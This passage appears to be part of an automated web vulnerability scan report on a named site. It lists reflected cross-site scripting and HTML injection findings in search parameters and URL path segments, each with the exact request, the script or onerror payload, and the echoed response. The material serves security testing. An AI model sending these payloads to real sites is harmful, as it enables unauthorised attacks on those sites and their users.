Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62417"><img%20src%3da%20onerror%3dalert(1)>2730a6ff81a was submitted in the cat parameter. This input was echoed as 62417\"><img src=a onerror=alert(1)>2730a6ff81a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /communication/broadband/search.php?cat=1562417"><img%20src%3da%20onerror%3dalert(1)>2730a6ff81a&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=1562417\"><img src=a onerror=alert(1)>2730a6ff81a">
...[SNIP]...

2.471. http://www.resellerbase.com/communication/broadband/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ecab3<a>cd8845b6305 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/search.php?keyword=search...ecab3<a>cd8845b6305&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?keyword=search...ecab3<a>cd8845b6305&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.472. http://www.resellerbase.com/communication/broadband/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2bb4b<script>alert(1)</script>16c137b50dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/search.php?2bb4b<script>alert(1)</script>16c137b50dc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?2bb4b<script>alert(1)</script>16c137b50dc=1 was not found on this server.</p>
...[SNIP]...

2.473. http://www.resellerbase.com/communication/broadband/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 70431<a>5b9b97c7f20 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/search.php?keyword=search...&Submit3=Search&opt=270431<a>5b9b97c7f20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?keyword=search...&Submit3=Search&opt=270431<a>5b9b97c7f20 was not found on this server.</p>
...[SNIP]...

2.474. http://www.resellerbase.com/communication/broadband/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab7fb<script>alert(1)</script>d1258050a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationab7fb<script>alert(1)</script>d1258050a53/broadband/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationab7fb<script>alert(1)</script>d1258050a53/broadband/themes/ was not found on this server.</p>
...[SNIP]...

2.475. http://www.resellerbase.com/communication/broadband/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b84d<script>alert(1)</script>bad5281babd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband2b84d<script>alert(1)</script>bad5281babd/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband2b84d<script>alert(1)</script>bad5281babd/themes/ was not found on this server.</p>
...[SNIP]...

2.476. http://www.resellerbase.com/communication/broadband/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0de3<script>alert(1)</script>f81e772748f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themesf0de3<script>alert(1)</script>f81e772748f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themesf0de3<script>alert(1)</script>f81e772748f/ was not found on this server.</p>
...[SNIP]...

2.477. http://www.resellerbase.com/communication/broadband/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5cd9<script>alert(1)</script>ca50bdc7e63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/?c5cd9<script>alert(1)</script>ca50bdc7e63=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/?c5cd9<script>alert(1)</script>ca50bdc7e63=1 was not found on this server.</p>
...[SNIP]...

2.478. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b785<script>alert(1)</script>1481ba10dc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication9b785<script>alert(1)</script>1481ba10dc6/broadband/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication9b785<script>alert(1)</script>1481ba10dc6/broadband/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.479. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e84b3<script>alert(1)</script>2be0904de3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbande84b3<script>alert(1)</script>2be0904de3a/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbande84b3<script>alert(1)</script>2be0904de3a/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.480. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 601ba<script>alert(1)</script>551fc81cb15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes601ba<script>alert(1)</script>551fc81cb15/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes601ba<script>alert(1)</script>551fc81cb15/kosmos/ was not found on this server.</p>
...[SNIP]...

2.481. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9679c<script>alert(1)</script>a2a1a108622 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos9679c<script>alert(1)</script>a2a1a108622/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos9679c<script>alert(1)</script>a2a1a108622/ was not found on this server.</p>
...[SNIP]...

2.482. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c0d6<script>alert(1)</script>91f8c26408f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/?7c0d6<script>alert(1)</script>91f8c26408f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/?7c0d6<script>alert(1)</script>91f8c26408f=1 was not found on this server.</p>
...[SNIP]...

2.483. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33e5b<script>alert(1)</script>e45b54c6288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication33e5b<script>alert(1)</script>e45b54c6288/broadband/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication33e5b<script>alert(1)</script>e45b54c6288/broadband/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.484. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7663d<script>alert(1)</script>a11f598e84a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband7663d<script>alert(1)</script>a11f598e84a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband7663d<script>alert(1)</script>a11f598e84a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.485. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 95d08<script>alert(1)</script>15072d99a79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes95d08<script>alert(1)</script>15072d99a79/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes95d08<script>alert(1)</script>15072d99a79/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.486. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0836<script>alert(1)</script>2fb880d8bc4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmosf0836<script>alert(1)</script>2fb880d8bc4/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmosf0836<script>alert(1)</script>2fb880d8bc4/images/ was not found on this server.</p>
...[SNIP]...

2.487. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload adb6e<script>alert(1)</script>cad1a47052b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesadb6e<script>alert(1)</script>cad1a47052b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesadb6e<script>alert(1)</script>cad1a47052b/ was not found on this server.</p>
...[SNIP]...

2.488. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f70c6<script>alert(1)</script>ea66fc372bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/?f70c6<script>alert(1)</script>ea66fc372bb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/?f70c6<script>alert(1)</script>ea66fc372bb=1 was not found on this server.</p>
...[SNIP]...

2.489. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 429c7<script>alert(1)</script>4816cfd906 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication429c7<script>alert(1)</script>4816cfd906/broadband/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
